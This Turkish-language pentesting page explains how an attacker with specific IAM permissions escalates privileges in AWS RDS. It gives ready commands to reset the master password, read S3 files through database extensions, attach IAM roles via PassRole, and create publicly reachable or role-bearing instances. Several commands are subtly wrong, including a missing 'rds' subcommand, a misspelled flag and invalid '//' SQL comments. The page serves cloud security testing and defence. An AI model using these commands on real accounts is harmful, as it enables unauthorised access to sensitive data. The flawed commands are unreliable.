AWS - RDS Privesc

RDS - İlişkisel Veritabanı Servisi

RDS hakkında daha fazla bilgi için kontrol edin:

rds:ModifyDBInstance

Bu izinle bir saldırgan ana kullanıcının şifresini değiştirebilir ve veritabanı içindeki oturumu değiştirebilir:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Olası Etki: Veritabanlarında hassas bilgileri bulmak.

rds-db:connect

belgelere göre, bu izne sahip bir kullanıcı DB örneğine bağlanabilir.

RDS Rol IAM izinlerini kötüye kullanma

Postgresql (Aurora)

Öncelikle bu veritabanının başka bir AWS hizmetine erişim için kullanılıp kullanılmadığını kontrol edebilirsiniz. Bunu, kurulu uzantılara bakarak kontrol edebilirsiniz:

SELECT * FROM pg_extension;

Eğer aws_s3 gibi bir şey bulursanız, bu veritabanının S3 üzerinde bir tür erişime sahip olduğunu varsayabilirsiniz (diğer uzantılar aws_ml ve aws_lambda gibi uzantılar da vardır).

Ayrıca, aws rds describe-db-clusters komutunu çalıştırma izinleriniz varsa, AssociatedRoles alanında kümenin herhangi bir IAM Rolü ile ilişkilendirilip ilişkilendirilmediğini görebilirsiniz. Eğer varsa, veritabanının diğer AWS hizmetlerine erişim için hazırlandığını varsayabilirsiniz. Rolün adı (veya rolün izinlerini alabiliyorsanız) temelinde, veritabanının ne tür ek erişimlere sahip olduğunu tahmin edebilirsiniz.

Artık, bir bucket içindeki bir dosyayı okumak için tam yolu bilmeniz gerekiyor. Bunu şu şekilde okuyabilirsiniz:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Eğer ham AWS kimlik bilgilerine sahip olsaydınız, bunları S3 verilerine erişmek için de kullanabilirdiniz:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

Mysql içinde show variables; komutunu çalıştırın ve aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role gibi değişkenlerin değerleri varsa, veritabanasının S3 verilerine erişmeye hazır olduğunu varsayabilirsiniz.

Ayrıca, aws rds describe-db-clusters komutunu çalıştırma izniniz varsa, kümenin herhangi bir ilişkili rolü olup olmadığını kontrol edebilirsiniz; bu genellikle AWS hizmetlerine erişim anlamına gelir.

Artık, bir bucket içindeki bir dosyayı okumak için tam yolu bilmeniz gerekiyor. Bunu şu şekilde okuyabilirsiniz:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

rds:AddRoleToDBCluster ve iam:PassRole izinlerine sahip bir saldırgan, mevcut bir RDS örneğine belirli bir rol ekleyebilir. Bu, saldırgana hassas verilere erişim sağlama veya örnekteki verileri değiştirme imkanı verebilir.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potansiyel Etki: RDS örneğindeki hassas verilere erişim veya verilere yetkisiz değişiklikler. Bazı DB'lerin, parametre gruplarında rol ARN'sinin belirtilmesi gibi ek yapılandırmalara ihtiyaç duyduğunu unutmayın.

rds:CreateDBInstance

Bu izinle bir saldırgan, zaten var olan ve bir IAM rolü eklenmiş bir küme içinde yeni bir örnek oluşturabilir. Ana kullanıcı şifresini değiştiremeyecek, ancak yeni veritabanı örneğini internete açma olanağına sahip olabilir:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

rds:CreateDBInstance ve iam:PassRole izinlerine sahip bir saldırgan, belirtilen bir rol ile yeni bir RDS örneği oluşturabilir. Saldırgan daha sonra potansiyel olarak hassas verilere erişebilir veya örnekteki verileri değiştirebilir.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Olası Etki: RDS örneğindeki hassas verilere erişim veya verilere yetkisiz değişiklikler.

rds:AddRoleToDBInstance, iam:PassRole

rds:AddRoleToDBInstance ve iam:PassRole izinlerine sahip bir saldırgan, mevcut bir RDS örneğine belirli bir rol ekleyebilir. Bu, saldırgana hassas verilere erişim sağlama veya örnekteki verileri değiştirme imkanı verebilir.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Potansiyel Etki: RDS örneğindeki hassas verilere erişim veya verilere yetkisiz değişiklikler.